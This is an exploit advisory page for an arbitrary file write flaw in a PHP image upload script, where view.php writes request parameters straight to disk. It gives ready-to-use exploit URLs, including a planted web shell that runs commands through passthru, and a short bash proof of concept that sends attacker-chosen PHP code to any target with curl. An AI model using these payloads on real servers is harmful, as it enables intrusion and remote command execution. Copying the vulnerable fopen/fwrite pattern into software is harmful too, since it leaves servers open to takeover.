Scripteen İmage Upload Script - Arbitrary File Injection

2019.10.23

Credit: z3r0fy

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

[+] Exploit Title : Scripteen İmage Upload Script Arbitrary File Injection

[+] Venedor Home Page : https://scripteen.com/
[+] Author : z3r0fy
[+] Twitter : z3r0fy
[+] Website : www.bugcontainer.gq


[+] Description :

Due to these codes in the View.php file

$home  =  fopen($_GET["file"],  "w");  fwrite($home,  $_GET["data"]);  

File can be written arbitrarily 
Exploit :  /app/view.php?file=shell.php&data=<?php phpinfo();?>
If you want to be made more offensive, 
app/view.php?file=shell.php&data=<?php passthru($_GET["cmd"]);?>
After poc is applied, This way the command can be run on the server "shell.php?cmd=" ​​



[+] PoC : 

#!/bin/bash
echo "
 __________ ____   ___  _______   __
|__  /___ /|  _ \ / _ \|  ___\ \ / /
  / /  |_ \| |_) | | | | |_   \ V / 
 / /_ ___) |  _ <| |_| |  _|   | |  
/____|____/|_| \_\\___/|_|     |_| 

"
echo" "
echo -n "[+] TARGET : " ;read hedef
echo -n "[+] PHP Code : " ;read kod
curl $hedef/app/view.php?file=shell.php&data=$kod

References:

http://bugcontainer.gq/kutuphane/scripteen-arbitrary-file-injection.txt

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Scripteen İmage Upload Script - Arbitrary File Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.